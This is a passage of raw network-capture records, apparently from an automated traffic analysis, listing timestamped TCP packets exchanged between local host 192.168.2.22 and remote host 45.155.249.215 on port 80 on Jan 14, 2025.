                                                                                              Jan 14, 2025 16:25:37.585117102 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585131884 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585134029 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585151911 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585154057 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585165024 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585170031 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585190058 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585192919 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585201025 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585231066 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585253000 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585264921 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585287094 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585287094 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585303068 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585305929 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585321903 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585324049 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585340977 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585342884 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585361958 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585361958 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585376978 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.585380077 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585397959 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.585407019 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.587655067 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.587662935 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.587676048 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.587685108 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.587691069 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.587718010 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.619869947 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.619908094 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.619936943 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.619961977 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.619966984 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.619985104 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620003939 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620003939 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620016098 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620016098 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620039940 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620050907 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620050907 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620066881 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620080948 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620084047 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620096922 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620114088 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620114088 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620130062 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620135069 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620145082 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620152950 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620167971 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620181084 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620182991 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620193005 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620214939 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620214939 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620227098 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620229006 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620245934 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620246887 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620259047 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620260000 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620277882 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620285034 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620292902 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620301962 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620320082 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620321989 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620332956 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620338917 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620349884 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620359898 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620367050 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620383024 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620390892 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620395899 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620414019 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620414972 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620426893 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620434999 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620444059 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620451927 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620464087 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620465040 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620484114 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620496988 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620505095 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620517969 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620538950 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620544910 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620549917 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620562077 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620573997 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620578051 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620592117 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620594978 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620610952 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620610952 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620624065 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620628119 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620640039 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620652914 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620654106 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620667934 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620681047 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620687962 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620688915 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620699883 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620707989 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620718002 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620718002 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620732069 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620740891 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620745897 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620753050 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620771885 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620775938 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620789051 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620793104 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620806932 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620810032 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620822906 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620822906 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620826960 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620841026 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620848894 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620861053 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620873928 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620881081 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620887041 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620897055 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620903969 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620913982 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620924950 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620928049 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620949030 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620959044 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620959997 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620974064 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620982885 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.620987892 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.620994091 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621014118 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621015072 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621026039 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621032000 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621042967 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621049881 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621058941 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621073008 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621081114 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621084929 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621098995 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621104956 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621118069 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621120930 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621130943 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621140957 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621145964 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621150970 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621174097 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621177912 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621186972 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621197939 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621201992 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621210098 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621228933 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621234894 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621239901 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621248960 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621258020 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621260881 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621275902 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621282101 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621289015 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621294975 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621308088 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621314049 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621329069 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621332884 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621344090 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621345043 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621364117 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621366978 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621378899 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621387959 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621393919 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621402979 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621414900 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.621418953 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621433020 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.621438026 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707648039 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707657099 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707673073 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707673073 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707681894 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707693100 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707710981 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707724094 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707736969 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707746029 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707762957 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707767963 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707782984 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707791090 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707809925 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707817078 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707823992 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707838058 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707847118 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707859993 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707859993 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707871914 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707885027 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707885981 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707890034 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707909107 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707921982 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707927942 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707942963 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707947016 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707962036 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707962990 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707984924 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.707989931 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.707989931 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708003044 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708014011 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708024025 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708035946 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708039999 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708059072 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708062887 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708062887 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708062887 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708076000 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708086967 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708097935 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708108902 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.708137989 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708138943 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708138943 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708163023 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.708235025 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.714950085 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.714973927 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.714984894 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715004921 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715020895 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715020895 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715030909 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715044022 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715044022 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715073109 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715085983 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715092897 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715101004 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715121984 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715122938 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715137005 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715157986 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715167046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715167046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715167046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715173960 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715190887 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715203047 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715213060 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715214968 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715240002 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715241909 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715255022 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715261936 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715277910 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715287924 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715287924 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715310097 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715320110 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715332031 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715352058 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715368986 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715378046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715378046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715388060 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715398073 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715409994 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.715418100 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.715461969 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792386055 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792398930 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792422056 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792433977 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792459965 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792473078 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792476892 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792501926 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792509079 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792510033 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792510033 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792515039 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792537928 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792538881 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792555094 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792558908 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792570114 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792573929 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792593002 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792597055 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792608023 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792615891 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792630911 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792644978 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792644978 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792671919 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792680979 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792695999 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792706966 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792720079 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792727947 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792732000 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.792754889 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.792766094 CET804916345.155.249.215192.168.2.22
